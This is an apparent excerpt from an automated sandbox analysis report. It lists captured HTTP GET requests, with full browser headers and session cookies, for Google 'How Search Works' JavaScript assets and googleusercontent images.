            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/u_mMVaZ5.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/5Ss99t85.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/_OAi-NRQ.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/RpI-OtYr.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/_OAi-NRQ.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/0XPwTFcg.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/ycaG4YXp.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/ianzD0dL.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/CiLn66Ai.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/zRFBfJZH.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/IFunn9hk.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/CiLn66Ai.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/HxYQzxVf.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/BhmWRCy0.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/p9kcPq91.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/IYoTYjYE.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/RpI-OtYr.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/5Ss99t85.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/ianzD0dL.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/IFunn9hk.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/HxYQzxVf.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /DeWZgEYlH2q4TTbBRoog4uNnVRjqzWYmCj7_meS-_EZ_TSyWr22SIBeaCTsEAuu5U0QaubzYyJKyUzQmEqZQ5ZVAGHJrno0fKYEdZA=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /-l2uCHxepneGNmf6MyjbK_YHkf7i3lgbrUWvNJL8CQInmOWrMChhC9vcKs27pJqtERrM7t14UCh0rPVcKg3rHBl2hAV3pUwCrgSP=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /OMmSijDU0neu_vZPqLWBrVJsQGT_D0ejrnpIgQMPkTZC-0s9dO6_kbV3sGb2q9BWmpEQDirGidE1rvGwp9BnCPpv0QfzLqnZ-noZLw=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /iRxTGREAOizQhtbCjDGShDHvBc39qEI004M8SClsSzIBgvBsbUMFNVMDfAfzoEzgvrS6Vf4B246TDqhUz3c6TipagihVSofRuGO3=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gI_Wu9CXaFAeN534A2tATDsZ3bEG8n3-WBS9wLKP04aO_ld5Fc9AtgS9HneoWjp3HQW4EglmvlKL6kbxRZGmoU1wCws3vfnezMcsqg=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ByIuDjG_OxNhZWu_Bix9cHR32kCnpGrjVaunDIzC9Q75eon4dC4Ei5h2pcD85FyPcjk01iAIXNjCRMA99E2GK6qhjvxYjCzAa_APmw=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /DeWZgEYlH2q4TTbBRoog4uNnVRjqzWYmCj7_meS-_EZ_TSyWr22SIBeaCTsEAuu5U0QaubzYyJKyUzQmEqZQ5ZVAGHJrno0fKYEdZA=s0-rw-e365 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
